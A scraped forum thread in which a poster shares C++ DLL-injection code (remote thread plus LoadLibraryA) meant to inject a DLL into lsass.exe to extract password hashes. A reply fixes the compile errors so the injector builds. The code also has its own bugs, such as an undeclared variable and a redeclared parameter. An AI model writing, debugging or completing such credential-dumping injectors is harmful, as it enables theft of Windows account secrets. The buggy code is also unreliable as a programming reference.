hey i m trying to inject a dll into a process i.e lsass.exe to get hashes.Its a bit hacky but cant help its my project. I have a code of dll injection but in visual C++ it gives errors such as..
at TEXT("LoadLibraryA"))))---->>>argument const wchar incompatible with LPCSTR
at lpFuncAddr----------->>>argument type "LPVOID" incompatible with parameter type "LPTHREAD_START ROUTINE"
CODE:
BOOL InjectDLL(DWORD dwProcessId, LPCSTR lpszDLLPath)
{
HANDLE hProcess, hThread;
LPVOID lpBaseAddr, lpFuncAddr;
DWORD dwMemSize, dwExitCode;
BOOL bSuccess = FALSE;
HMODULE hUserDLL;
//convert char to wchar
char *lpszDLLPath = "hash.dll";
size_t origsize = strlen(orig) + 1;
const size_t newsize = 100;
size_t convertedChars = 0;
wchar_t dllpath[newsize];
mbstowcs_s(&convertedChars, dllpath, origsize, orig, _TRUNCATE);
if((hProcess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_QUERY_INFORMATION|PROCESS_VM_OPERATION
|PROCESS_VM_WRITE|PROCESS_VM_READ, FALSE, dwProcessId)))
{
dwMemSize = wcslen(dllpath) + 1;
if((lpBaseAddr = VirtualAllocEx(hProcess, NULL, dwMemSize, MEM_COMMIT, PAGE_READWRITE)))
{
if(WriteProcessMemory(hProcess, lpBaseAddr, lpszDLLPath, dwMemSize, NULL))
{
if((hUserDLL = LoadLibrary(TEXT("kernel32.dll"))))
{
if((lpFuncAddr = GetProcAddress(hUserDLL, TEXT("LoadLibraryA"))))
{
if((hThread = CreateRemoteThread(hProcess, NULL, 0, lpFuncAddr, lpBaseAddr, 0, NULL)))
{
WaitForSingleObject(hThread, INFINITE);
if(GetExitCodeThread(hThread, &dwExitCode)) {
bSuccess = (dwExitCode != 0) ? TRUE : FALSE;
}
CloseHandle(hThread);
}
}
FreeLibrary(hUserDLL);
}
}
VirtualFreeEx(hProcess, lpBaseAddr, 0, MEM_RELEASE);
}
CloseHandle(hProcess);
}
return bSuccess;
}
int WINAPI WinMain(HINSTANCE hThi开发者_开发技巧sInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow)
{
if(InjectDLL(PROCESSID, "hash.dll")) {
MessageBox(NULL, TEXT("DLL Injected!"), TEXT("DLL Injector"), MB_OK);
}else {
MessageBox(NULL, TEXT("Couldn't inject DLL"), TEXT("DLL Injector"), MB_OK | MB_ICONERROR);
}
return 0;
}
i m a beginner to dll and windows programming so will appreciate your help.
It looks like your functions are expecting LPCSTR instead of LPCTSTR. Lose the TEXT() macros and it should be fine.
For the second error, you should be able to cast lpFuncAddr to an LPTHREAD_START_ROUTINE with a simple static cast.
if((hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpFuncAddr, lpBaseAddr, 0, NULL)))
精彩评论